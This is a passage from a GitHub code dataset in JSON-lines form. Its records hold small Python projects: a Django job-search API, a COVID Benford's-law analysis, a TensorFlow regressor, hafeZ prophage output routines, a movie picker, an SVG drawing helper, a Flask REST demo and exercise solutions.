\"\n f\"Status will be updated to failure.\")\n dao.update_order_status(order.id, OrderStatus.FAILURE)\n","repo_name":"vinaynikhil313/exercise-backend","sub_path":"app/orders_service.py","file_name":"orders_service.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"857245346","text":"import json\nimport os\nimport urllib2\nfrom urllib import urlencode\n\nfrom careerjet_api_client import CareerjetAPIClient\nfrom django.http import JsonResponse, HttpResponseBadRequest, HttpResponse\n\nfrom models import SearchResult, SavedJob, Job, User\n\ncareerjet_key = os.environ.get('CAREERJET_KEY')\ncj = CareerjetAPIClient(\"en_US\")\nindeed_key = os.environ.get('INDEED_KEY')\n\n\ndef careerjet_query(job, location, url, user_ip, user_agent):\n cj_query = {\n 'location': location,\n 'keywords': job,\n 'affid': careerjet_key,\n 'user_ip': user_ip,\n 'url': url,\n 'user_agent': user_agent,\n }\n\n # Get the first results page\n result_json = cj.search(cj_query)\n\n # Get the other pages\n all_jobs = result_json['jobs']\n for page in range(2, result_json['pages']):\n cj_query['page'] = page\n cj_query['url'] = url\n result_json = cj.search(cj_query)\n all_jobs += result_json['jobs']\n\n return all_jobs\n\n\ndef indeed_query(job, location, user_ip, user_agent):\n all_jobs = []\n start = 0\n num_requests = 0\n while start < 1000:\n query = {\n 'publisher': indeed_key,\n 'v': 2,\n 'format': 'json',\n 'q': job,\n 'l': location,\n 'limit': 25,\n 'latlong': 1,\n 'userip': user_ip,\n 'useragent': user_agent,\n 'start': start\n }\n url = \"http://api.indeed.com/ads/apisearch?\" + urlencode(query)\n response = json.loads(urllib2.urlopen(url).read())\n num_requests += 1\n all_jobs += response['results']\n start = response['end'] + 1\n\n if len(response['results']) < 25:\n break\n\n return all_jobs\n\n\ndef indeed_single_job_query(job_id, user_ip, user_agent):\n query = {\n 'publisher': indeed_key,\n 'v': 2,\n 'format': 'json',\n 'latlong': 1,\n 'userip': user_ip,\n 'useragent': user_agent,\n 'jobkeys': job_id\n }\n url = \"http://api.indeed.com/ads/apigetjobs?\" + urlencode(query)\n response = json.loads(urllib2.urlopen(url).read())\n\n return response['results']\n\n\ndef jobs(request):\n # variables declared with HTTP GET, otherwise defaults provided\n job = request.GET.get('job', 'java')\n location = request.GET.get('location', 'california')\n\n # TODO - These should be found in the HTTP request headers\n user_ip = request.GET.get('user_ip', '11.22.33.44')\n url = request.GET.get('url', 'http://www.example.com/jobsearch?q=python&l=london')\n user_agent = request.GET.get('user_agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0')\n\n # Look for keywords in database\n results = SearchResult.objects.filter(job=job, location=location)\n\n # If length of results is 0\n if len(results) == 0:\n all_jobs = indeed_query(job, location, user_ip, user_agent)\n new_result = SearchResult(job=job,\n location=location,\n result=json.dumps(all_jobs, sort_keys=True, indent=0, separators=(',', ': ')))\n\n new_result.save()\n results = [new_result]\n\n return JsonResponse({\n 'jobs': json.loads(results[0].result)\n })\n\n\ndef save_job(request):\n user_id = request.GET.get('user', 0)\n users = User.objects.filter(id=user_id)\n if len(users) == 0:\n return HttpResponseBadRequest()\n user = users[0]\n\n job_id = request.GET.get('jobid')\n if job_id == None:\n return HttpResponseBadRequest()\n\n # Check if 
job is already saved by this user\n    results = SavedJob.objects.filter(user_id=user, job_id=job_id)\n    if len(results) == 0:\n        # Save job\n        new_saved = SavedJob(user_id=user, job_id=job_id)\n        new_saved.save()\n\n    return HttpResponse(status=204)\n\n\ndef get_saved_jobs(request):\n    user_id = request.GET.get('user', 0)\n    users = User.objects.filter(id=user_id)\n    if len(users) == 0:\n        return HttpResponseBadRequest()\n    user = users[0]\n\n    # Get saved jobs\n    saved = SavedJob.objects.filter(user_id=user)\n\n    # Convert saved entries into jobs\n    job_data = []\n    for saved_job in saved:\n        job = _get_job(request, saved_job.job_id)\n        if job is not None:\n            job_data.append(job)\n\n    return JsonResponse({\n        'jobs': job_data\n    })\n\n\ndef delete_saved_job(request):\n    user_id = request.GET.get('user', 0)\n    users = User.objects.filter(id=user_id)\n    if len(users) == 0:\n        return HttpResponseBadRequest()\n    user = users[0]\n\n    job_id = request.GET.get('jobid')\n    if job_id is None:\n        return HttpResponseBadRequest()\n\n    # Check if job is already saved\n    results = SavedJob.objects.filter(user_id=user, job_id=job_id)\n    for res in results:\n        res.delete()\n\n    return HttpResponse(status=204)\n\n\ndef _get_job(request, job_id):\n    user_ip = request.GET.get('user_ip', '11.22.33.44')\n    url = request.GET.get('url', 'http://www.example.com/jobsearch?q=python&l=london')\n    user_agent = request.GET.get('user_agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0')\n\n    # Get job\n    jobs = Job.objects.filter(job_id=job_id)\n    if len(jobs) > 0:\n        # Have cached job, return data\n        job = jobs[0]\n        return json.loads(job.data)\n\n    # Get data from API\n    response = indeed_single_job_query(job_id, user_ip, user_agent)\n    if len(response) > 0:\n        new_job = Job(job_id=job_id,\n                      data=json.dumps(response[0], sort_keys=True, indent=0, separators=(',', ': ')))\n        new_job.save()\n        return json.loads(new_job.data)\n\n    return None\n\n\ndef get_job(request):\n    job_id = request.GET.get('jobid')\n    if job_id is None:\n        return HttpResponseBadRequest()\n    return JsonResponse({\n        'job': _get_job(request, job_id)\n    })\n\n\ndef get_id(request):\n    token = request.GET.get('token')\n    if token is None:\n        return HttpResponseBadRequest()\n    users = User.objects.filter(g_id=token)\n\n    user = None\n    if len(users) == 0:\n        user = User(g_id=token)\n        user.save()\n    else:\n        user = users[0]\n\n    return JsonResponse({\n        'user_id': user.id\n    })\n","repo_name":"Ginnyxue/CS411A1Group3","sub_path":"server/server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13811368119","text":"import json\n\n#An example class is given. 
'time' is input in 24 hour format, no colon\n#'prompt' will give a popup if True, and just go to class otherwise\nschedule = [\n {'class_name': 'example', 'time': 1100, 'days':['M','W','F'], 'url':'www.google.com', 'prompt':True},\n {'class_name': 'ex2', 'time': 1530, 'days':['T','TH'], 'url': '', 'prompt': True}\n #Add more here\n]\n\nf = open('schedule.json', 'w')\njson.dump(schedule, f)\n","repo_name":"SahilJain314/AutoZoom","sub_path":"schedule_ex.py","file_name":"schedule_ex.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71491221634","text":"import os\nimport requests\nimport csv\nimport datetime\nimport matplotlib.pyplot as plt\n\nbuckets = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\nif not os.path.isfile('data.csv'):\n print('Downloading data...')\n try:\n data = requests.get('https://coronavirus.data.gov.uk/downloads/csv/coronavirus-cases_latest.csv')\n except Exception as e:\n print('Failed to retrieve data:')\n print(e)\n exit(1)\n with open('data.csv', 'w') as f:\n f.write(data.text)\n\n# Parse and bucket the data\nprint('Analysing data...')\nwith open('data.csv') as f:\n data = csv.reader(f)\n lastUpdated = '0'\n for row in data:\n if row[2] == 'ltla':\n firstDigit = int(str(row[4])[0])\n buckets[firstDigit] = buckets[firstDigit] + 1\n if row[3] != 'Specimen date':\n lastUpdated = max(lastUpdated, row[3])\n\n# Ignore 0s\nbuckets = buckets[1:]\n\n# Get percentages\ntotal = sum(buckets)\nfor i in range(0, len(buckets)):\n buckets[i] = 100 * buckets[i] / total\n\n# Plot\nprint('Plotting data...')\nfig, ax = plt.subplots()\nax.plot(range(1, 10), buckets, label = 'COVID stats')\nax.plot(range(1, 10), [30.1, 17.6, 12.5, 9.7, 7.9, 6.7, 5.8, 5.1, 4.6], label = 'Benford\\'s law')\nax.set(xlabel = 'First digit', ylabel = 'Frequency (%)', title = 'UK COVID statistics follow Benford\\'s law (as of ' + datetime.date.today().isoformat() + ')')\nplt.legend()\nif os.environ.get('CI') == 'true' or os.environ.get('HEADLESS') == 'true':\n plt.savefig('output.png')\nelse:\n plt.show()\n","repo_name":"domdomegg/uk-covid-stats-benfords-law","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15644630081","text":"import tensorflow as tf\nimport numpy as np\n\ndef runDNN(Xtrain, Ytrain,Xtest):\n\n #define the model features\n #FEATURES = ['height/width','depth']\n FEATURES = ['outputs']\n feature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]\n\n #define the DNN regressor\n regressor = tf.contrib.learn.DNNRegressor(feature_columns=feature_cols, hidden_units=[1,1])\n\n #define the input functions for training\n def get_input_fn(xData, yData=None, num_epochs=None, shuffle=True):\n return tf.estimator.inputs.numpy_input_fn(\n #x={FEATURES[i]: xData[:,i] for i in range(0,2)},\n x={FEATURES[0]: xData},\n y=yData,\n num_epochs=num_epochs,\n shuffle=shuffle)\n\n #training\n regressor.fit(input_fn=get_input_fn(Xtrain, Ytrain, None, False), steps=5000)\n\n #evaluation and getting loss\n ev = regressor.evaluate(input_fn=get_input_fn(Xtrain, Ytrain, 1, False))\n loss_score = ev[\"loss\"]\n print(\"Loss: {0:f}\".format(loss_score))\n\n #testing and predicting\n yhat = regressor.predict(input_fn=get_input_fn(Xtest, None, 1, False))\n predictions = np.array(list(p for p in yhat))\n return 
predictions","repo_name":"RajatBhageria/ComputerVision-Absolute-Depth-Detection-With-Single-Image","sub_path":"deepNeuralNet.py","file_name":"deepNeuralNet.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"3115330881","text":"import time\nfrom Bio import SeqIO\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os, glob\nimport numpy as np\nimport matplotlib\n\ndef get_names(roi_df):\n print('\\n{:#^50}'.format(' Finalising roi names '))\n start_time = time.time()\n counter = 1\n for index, row in roi_df.iterrows():\n roi_df.loc[index, 'roi_new'] = row['roi'].split('~')[0] + '~roi_' + str(counter)\n counter = counter + 1\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n return roi_df\n\ndef output_roi_seqs(roi_df,roi_dna,output_folder):\n print('\\n{:#^50}'.format(' Outputting roi sequences '))\n start_time = time.time()\n final_roi_dna = []\n for i in roi_df['roi'].unique():\n for j in roi_dna:\n if j.id == i:\n j.id = roi_df['roi_new'][roi_df['roi'] == i].iloc[0]\n j.description = ''\n j.name = ''\n final_roi_dna.append(j)\n SeqIO.write(final_roi_dna, output_folder + '/hafeZ_all_roi_seqs.fasta', 'fasta')\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_roi_orfs(roi_orf_dna,roi_df,output_folder,roi_orf_aa):\n print('\\n{:#^50}'.format(' Outputting roi orfs '))\n start_time = time.time()\n for i in roi_df['roi'].unique():\n orf_list = []\n for j in roi_orf_dna[i]:\n name = roi_df['roi_new'][roi_df['roi'] == i].iloc[0]\n j.id = name + '~' + j.id.split('~')[-1]\n orf_list.append(j)\n SeqIO.write(orf_list, output_folder + '/hafeZ_orfs_dna_' + name + '.fasta', 'fasta')\n for i in roi_df['roi'].unique():\n orf_list = []\n for j in roi_orf_aa[i]:\n name = roi_df['roi_new'][roi_df['roi'] == i].iloc[0]\n j.id = name + '~' + j.id.split('~')[-1]\n orf_list.append(j)\n SeqIO.write(orf_list, output_folder + '/hafeZ_orfs_aa_' + name + '.faa', 'fasta')\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_prophage_graphs(roi_df,depths,output_folder,median,mad):\n print('\\n{:#^50}'.format(' Making roi figures '))\n start_time = time.time()\n matplotlib.use('Agg')\n roi_df['contig'] = roi_df['roi'].str.split('~').str[0]\n roi_df = roi_df.astype({'start_pos': int, 'end_pos': int})\n for i in roi_df['contig'].unique():\n z = [((0.6745*(x - median))/mad) for x in depths[i]]\n fig = plt.gcf()\n fig.set_size_inches(18.5, 10.5)\n plt.plot(z)\n pos = 4\n for index, row in roi_df[roi_df['contig'] == i].iterrows():\n if (row['circular'] == False) | ((row['circular'] == True) & (row['roi'].split('_')[-1] == 'c1')):\n plt.axvspan(row['start_pos'], row['end_pos'], color='r', alpha=0.5, lw=0)\n plt.annotate(row['roi_new'], xy=(row['start_pos'], pos), xytext=(row['start_pos'] + len(z)/10, pos + 1),\n arrowprops=dict(facecolor='black', arrowstyle = '->', connectionstyle='arc3', lw =2))\n elif (row['circular'] == True) & (row['roi'].split('_')[-1] == 'c2'):\n plt.axvspan(row['start_pos'], row['contig_len'], color='r', alpha=0.5, lw=0)\n plt.axvspan(0,row['end_pos'], color='r', alpha=0.5, lw=0)\n plt.annotate(row['roi_new'], xy=(row['start_pos'], pos), xytext=(row['start_pos'] + len(z)/10, pos + 1),\n arrowprops=dict(facecolor='black', arrowstyle = '->', connectionstyle='arc3', lw 
=2))\n plt.annotate('', xy=(row['end_pos'], pos),\n arrowprops=dict(facecolor='black', arrowstyle = '->', connectionstyle='arc3', lw =2))\n pos = pos + (np.max(z)/len(roi_df[roi_df['contig'] == i]))\n plt.savefig(output_folder + '/hafeZ_prophage_for_' + i + '.png', format = 'png')\n plt.clf()\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_hmm_table(roi_df,output_folder):\n print('\\n{:#^50}'.format(' Outputting hmm hit table '))\n start_time = time.time()\n df = pd.read_csv(output_folder + '/temp_hmms.tab', sep='\\t')\n df = df[df['orf'].str.split('~').str[:-1].str.join('~').isin(list(roi_df['roi']))]\n for index, row in df.iterrows():\n old = '~'.join(row['orf'].split('~')[:-1])\n df.loc[index, 'orf'] = roi_df['roi_new'][roi_df['roi'] == old].iloc[0]\n df.columns = ['vog_no','orf_name','e_value','orf_no','vog_phage_taxonomy','vog_description']\n df = df[['orf_name','orf_no','vog_no','e_value','vog_phage_taxonomy','vog_description']]\n df = df.reset_index(drop=True)\n sort = (df.assign(orf_no2=df['orf_no'].str.extract(r'(\\d+)$').astype(int)).sort_values(['orf_name', 'orf_no2']).index)\n df = df.iloc[sort]\n df.to_csv(output_folder + '/hafeZ_hmm_hits.tsv', sep='\\t', index=False)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_roi_table(roi_df,output_folder):\n print('\\n{:#^50}'.format(' Outputting roi table '))\n start_time = time.time()\n for index, row in roi_df.iterrows():\n if row['circular'] == False:\n roi_df.loc[index, 'roi_length'] = row['end_pos'] - row['start_pos'] + 1\n elif (row['circular'] == True) & (row['roi'].split('_')[-1] == 'c1'):\n if row['start_pos'] > row['end_pos']:\n len_1 = row['contig_len'] - row['start_pos']\n len_2 = row['end_pos'] - 0\n roi_df.loc[index, 'roi_length'] = len_1 + len_2\n else:\n roi_df.loc[index, 'roi_length'] = row['end_pos'] - row['start_pos'] + 1 \n elif (row['circular'] == True) & (row['roi'].split('_')[-1] == 'c2'):\n if row['start_pos'] > row['end_pos']:\n roi_df.loc[index, 'roi_length'] = row['end_pos'] - row['start_pos'] + 1 \n else:\n len_1 = row['contig_len'] - row['start_pos']\n len_2 = row['end_pos'] - 0\n roi_df.loc[index, 'roi_length'] = len_1 + len_2\n ##### will add these columns in in a later version\n # roi_df = roi_df[['roi_new', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','med_z','attL_seq','attR_seq', 'contig_split','longest_below_z']].copy()\n # roi_df.columns = ['roi', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','med_z','attL_seq','attR_seq', 'contig_split', 'longest_below_z']\n roi_df = roi_df[['roi_new', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','attL_seq','attR_seq']].copy()\n roi_df.columns = ['roi', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','attL_seq','attR_seq']\n for index, row in roi_df.iterrows():\n roi_df.loc[index, 'start_pos'] = row['start_pos'] + 1\n roi_df.loc[index, 'frac_pvog'] = round(row['frac_pvog'],2)\n roi_df.loc[index, 'roi_length'] = int(row['roi_length'])\n roi_df.to_csv(output_folder + '/hafeZ_summary_all_rois.tsv', sep='\\t', index=False)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_no_roi(output_folder):\n roi_df = 
pd.DataFrame(data = {'roi': [np.nan], 'start_pos': [np.nan], 'end_pos': [np.nan], 'roi_length': [np.nan], 'orf_count': [np.nan], 'frac_pvog': [np.nan], 'circular': [np.nan]})\n roi_df.to_csv(output_folder + '/hafeZ_summary_all_rois.tsv', sep='\\t', index=False)\n print('\\n{:#^50}'.format(''))\n print('{:#^50}'.format(' NO ACTIVE PROPHAGE FOUND '))\n print('{:#^50}'.format(' exiting and outputing empty .tsv '))\n print('{:#^50}'.format(''))\n\n\ndef output_contig_Z(depths,output_folder,median,mad):\n print('\\n{:#^50}'.format(' Making figures of contig Z-scores'))\n start_time = time.time()\n matplotlib.use('Agg')\n for i in depths:\n z = [((0.6745*(x - median))/mad) for x in depths[i]]\n fig = plt.gcf()\n fig.set_size_inches(18.5, 10.5)\n plt.plot(z)\n pos = 4\n plt.savefig(output_folder + '/zscores_for_contig' + i + '.png', format = 'png')\n plt.clf()\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef clean_up(output_folder):\n print('\\n{:#^50}'.format(' Doing final tidy '))\n start_time = time.time()\n for f in glob.glob(output_folder + '/temp*'):\n os.remove(f)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\n\ndef output_hmm_table_phrogs(roi_df,output_folder,db_path):\n print('\\n{:#^50}'.format(' Outputting hmm hit table '))\n start_time = time.time()\n df = pd.read_csv(output_folder + '/temp_hmms.tab', sep='\\t', names = ['orf','vog_no','e_value','orf_no']) \n df = df[df['orf'].str.split('~').str[:-1].str.join('~').isin(list(roi_df['roi']))]\n phrogs_db = pd.read_csv(db_path + '/phrogs_table_almostfinal_plusGO_wNA_utf8.tsv', sep='\\t', usecols = [0,6], names=['phrog','category'])\n phrogs_db['phrog'] = 'phrog_' + phrogs_db['phrog'].astype(str)\n for index, row in df.iterrows():\n old = '~'.join(row['orf'].split('~')[:-1])\n df.loc[index, 'orf'] = roi_df['roi_new'][roi_df['roi'] == old].iloc[0]\n if row['e_value'] > 0.00001:\n df.loc[index, 'vog_no'] = np.nan \n df.loc[index, 'e_value'] = np.nan\n df.loc[index, 'number'] = int(row['orf_no'].split('_')[-1])\n df.loc[index,'vog_description'] = phrogs_db['category'][phrogs_db['phrog'] == row['vog_no']].iloc[0]\n df.columns = ['roi','vog_no','e_value','orf_no','number','vog_description']\n df = df.sort_values(by=['roi','number'])\n df = df[['roi','orf_no','vog_no','e_value','vog_description']]\n df = df.reset_index(drop=True)\n df.to_csv(output_folder + '/hafeZ_hmm_hits.tsv', sep='\\t', index=False)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))","repo_name":"Chrisjrt/hafeZ","sub_path":"hZ/get_output.py","file_name":"get_output.py","file_ext":"py","file_size_in_byte":10278,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"41272359483","text":"__author__ = 'joaquim'\n\"\"\"\nURI Online Judge | 1174\nSeleçao em Vetor I\n\nAdaptado por Neilor Tonin, URI Brasil\nTimelimit: 1\n\nFaça um programa que leia um vetor A[100]. 
No final, mostre todas as posições do vetor que armazenam um valor menor ou\nigual a 10 e o valor armazenado em cada uma das posições.\nEntrada\n\nA entrada contém 100 valores, podendo ser inteiros, reais, positivos ou negativos.\nSaída\n\nPara cada valor do vetor menor ou igual a 10, escreva \"A[i] = x\", onde i é a posição do vetor e x é o valor armazenado\nna posição, com uma casa após o ponto decimal.\nExemplo de Entrada \tExemplo de Saída\n\n0\n-5\n63\n-8.5\n...\n\nA[0] = 0.0\nA[1] = -5.0\nA[3] = -8.5\n...\n\"\"\"\na = [float(i) for i in range(100)]\n\nfor i in range(100):\n num = float(input())\n a[i] = num\n\nfor j in range(len(a)):\n if a[j] <= 10.0:\n print(\"A[%d] = %.1f\" %(j,a[j]))","repo_name":"jaf88/My-URI-Judge","sub_path":"1174.py","file_name":"1174.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1118632644","text":"from heapq import nlargest, heappush, heappop\nfrom typing import List\nfrom dataclasses import dataclass, field\nfrom bisect import bisect_left\n\n@dataclass(order=True)\nclass Movie:\n movie_id: int=field(compare=False)\n movie_length: int=field(compare=False)\n movie_name: str=field(compare=False)\n movie_weight: float\n\ndef index(a, x):\n 'Locate the leftmost value exactly equal to x'\n i = bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n raise ValueError\n\ndef get_maximized_pleasure(time_have: int, movies_origin: List[Movie]) -> List[Movie]:\n movies = movies_origin\n n = len(movies)\n curr = 0\n movies.sort(key=lambda x:x.movie_length)\n res = []\n \n pq = []\n time_spend = 0\n while True:\n while curr < n and movies[curr].movie_length <= time_have-time_spend:\n heappush(pq, movies[curr])\n curr += 1\n\n if pq:\n temp_movie = heappop(pq)\n res.append(temp_movie)\n time_spend += temp_movie.movie_length\n else:\n break\n\n movies.remove(temp_movie)\n pq.clear()\n curr = 0\n n=len(movies)\n \n return res\n\n\ndef pick_movies_by_time(time_have:int, movies:list[dict]) -> list[dict]:\n movies_input = []\n movies_map = {}\n for m in movies:\n # index, movie_runtime, movie_name, movie_rating*movie_likability\n movies_input.append(Movie(m['id'], m['runtime'], m['name'], -m['rating']*m['likability']))\n movies_map[m['id']] = m\n pick_output = get_maximized_pleasure(time_have, movies_input)\n res = []\n for m in pick_output:\n res.append(movies_map[m.movie_id])\n\n return res\n\ndef get_maximized_nums(num: int, movies_origin: List[Movie]) -> List[Movie]:\n movies = movies_origin\n movies.sort(key=lambda x:x.movie_weight)\n \n return movies[:num]\n\ndef pick_movies_by_num(num:int, movies:List[dict]) -> List[dict]:\n movies_input = []\n movies_map = {}\n for m in movies:\n # index, movie_runtime, movie_name, movie_rating*movie_likability\n movies_input.append(Movie(m['id'], m['runtime'], m['name'], -m['rating']*m['likability']))\n movies_map[m['id']] = m\n pick_output = get_maximized_nums(num, movies_input)\n res = []\n for m in pick_output:\n res.append(movies_map[m.movie_id])\n\n return res","repo_name":"youzeFix/happymovie","sub_path":"server/server/pick_algo.py","file_name":"pick_algo.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28499497049","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[287]:\n\n\nfrom IPython.display import display, SVG\nimport svgwrite\n\nclass Draw:\n def __init__(self, file, width=600, height=200, 
marginX=10, marginY=10):\n        \n        self.file = file\n        \n        self.width = width\n        self.height = height\n        self.marginX = marginX\n        self.offSetX = marginX//2\n        self.marginY = marginY\n        self.offSetY = marginY//2\n        self.boundingBox = ((self.offSetX, self.offSetY), (width-marginX, height-marginY))\n        \n        self.drawObj = svgwrite.Drawing(filename=file, height='{}px'.format(height), width='{}px'.format(width))\n        self.drawObj.viewbox(0, 0, self.width, self.height)\n        self.mainBox = self.drawObj.add(self.drawObj.g(id='mainBox'))\n        \n        self.PATTERNS_COLORS = ['green', 'blue', 'red', 'pink', 'gray', 'brown', \n                                'orange', 'yellow', 'black', 'white', 'purple', 'cyan']\n        self.added_patterns = []\n        self.boxes = []\n        \n    def show(self):\n        self.drawObj.save()\n        display(SVG(filename=self.file))\n\n    def listPatterns(self):\n        return ' '.join([' '.join([c+'|', c+'-', c+'\\\\', c+'/']) for c in self.PATTERNS_COLORS]).split()\n    \n    def fillPattern(self, name):\n        if not name in self.listPatterns():\n            raise Exception('Options are: ' + ', '.join(self.listPatterns()))\n        \n        name = name.replace('\\\\', '@')\n        if not name in self.added_patterns:\n            c = name[:-1]\n            o = name[-1]\n            s = (3, 3) if (o in ['-', '|']) else (100, 100)\n            pattern = self.drawObj.pattern(size=s, id='pattern-%s' % name, patternUnits=\"userSpaceOnUse\")\n            \n            if (o in ['-', '|']):\n                tLine = ((0, 2), (3, 2)) if o == '-' else ((2, 3), (2, 0))\n                pattern.add(self.drawObj.line(start=tLine[0], end=tLine[1], stroke=c, stroke_width=0.5))\n            else:\n                a = 100 if o == '/' else 0\n                b = 0 if o == '/' else 100\n                for i in range(-100, 200, 4):\n                    pattern.add(self.drawObj.line(start=(i, a), end=(i+100, b), stroke=c, stroke_width=0.5))\n            \n            self.drawObj.defs.add(pattern)\n            self.added_patterns.append(name)\n        return \"url(#pattern-%s)\" % name\n    \n    def box(self, name=None):\n        name = ('box%s' % len(self.boxes)) if name is None else name\n        return self.drawObj.add(self.drawObj.g(id=name))\n    \n    def square(self, x, y, w, h, c, box=None):\n        box = self.mainBox if box is None else box\n        box.add(self.drawObj.rect(insert=(x, y), size=(w, h), fill=c))\n    \n    def text(self, text, x, y, box=None, italic=False, family='Times', size=12, bold=False):\n        box = self.mainBox if box is None else box\n        box.add(self.drawObj.text(\n            text, insert=(x, y), \n            font_style=\"italic\" if italic else 'normal', \n            font_family=family, \n            font_size=size, \n            font_weight= 'bold' if bold else 'normal'))\n    \n    def star(self, x, y, box=None, fill=\"gray\", stroke=\"white\", r=5):\n        box = self.mainBox if box is None else box\n        STAR8 = \"0 8 L 8 12 L 7 2 L 14 -4 L 4 -6 L 0 -15 L -4 -6 L -14 -4 L -7 2 L -8 12 L 0 8\"\n        STAR5 = \"0 5 L 5 8 L 4 1 L 9 -3 L 2 -4 L 0 -10 L -2 -4 L -9 -3 L -4 1 L -5 8 L 0 5\"\n        STAR = STAR8 if r == 8 else STAR5\n        d = 'M ' + ' L '.join([str(int(p.split()[0])+x) + ' ' + str(int(p.split()[1])+y) for p in STAR.split(\" L \")]) + ' z'\n        box.add(self.drawObj.path(d=d, fill=fill, stroke=stroke))\n\n    def seta(self, x1, x2, y, box=None, color='black', h=20, start=False, pS=4):\n        box = self.mainBox if box is None else box\n        box.add(self.drawObj.path(d='M {0} {1} C {0} {2} {3} {2} {3} {1}'.format(x1, y, y+h, x2), \n                                  fill=\"none\", stroke=color, stroke_width=pS//2))\n        xs = x1 if start else x2\n        box.add(self.drawObj.path(\n            d='M {0} {1} L {2} {1} L {3} {4} z'.format(xs-pS, y, xs+pS, xs, y-pS), stroke=color, fill=color))\n\n\n\n# In[291]:\n\n\ndraw = Draw('test.svg')\ndraw.square(30, 30, 100, 150, draw.fillPattern('red\\\\'))\ndraw.square(30, 30, 100, 150, draw.fillPattern('green/'))\n#draw.square(30, 30, 100, 
150, draw.fillPattern('blue|'))\n#draw.square(30, 30, 100, 150, draw.fillPattern('black-'))\ndraw.text('Miquéias', 30, 90)\ndraw.star(80, 90)\ndraw.seta(30, 80, 100)\ndraw.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MiqueiasFernandes/bioinformatics","sub_path":"drawSVG.py","file_name":"drawSVG.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"73754093633","text":"import random\nimport string\n\nfrom flask import Flask, request\nfrom flask_restful import reqparse, abort, Api, Resource\n\napp = Flask(__name__)\n\napi = Api(app)\n\nPersons_dict = {\n    \"1\": {'name': 'Aravind', 'domain': 'Web App'},\n    \"2\": {'name': 'Sandeep', 'domain': 'ML+DevOps'},\n    \"3\": {'name': 'Karthik', 'domain': 'Arduino'},\n}\n\nparser = reqparse.RequestParser()\nparser.add_argument('name')\nparser.add_argument('domain')\n\n# 404 -> Not found\n\n\ndef abort_if_person_doesnt_exist(id):\n    if id not in Persons_dict:\n        abort(404, message=\"Person {} doesn't exist\".format(id))\n\n\ndef abort_if_person_exists(id):\n    if id in Persons_dict:\n        abort(404, message=\"Person {} already exists\".format(id))\n\n\nclass Persons(Resource):\n    def get(self):\n        return Persons_dict\n\n    def post(self):\n        print(request.json)\n        print(request.get_json(force=True))\n        args = parser.parse_args()\n        print(args)\n        id = str(len(Persons_dict) + 1)\n        abort_if_person_exists(id)\n        Persons_dict[id] = args\n        # 201 -> created\n        return {'id': id}, 201\n\n\nclass Person(Resource):\n    def get(self, id):\n        # print(type(id))\n        # print(Persons_dict)\n        abort_if_person_doesnt_exist(id)\n        return {id: Persons_dict[id]}\n\n\napi.add_resource(Persons, '/persons')\napi.add_resource(Person, '/person/<id>')\n\n\n@app.route('/')\ndef index():\n    return 'OK!'\n\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"Aravind-Kannan/kidzafe","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72410645315","text":"#Gordonedjhill\r\n#Wages calculation\r\n\r\ndef payroll(sal):\r\n    k=0\r\n    payroll = 0\r\n    while k <= 9:\r\n        payroll = payroll + sal\r\n        k = k + 1\r\n    return payroll\r\n\r\ndef main():\r\n    file = \"namesWages.txt\"\r\n    file2 = 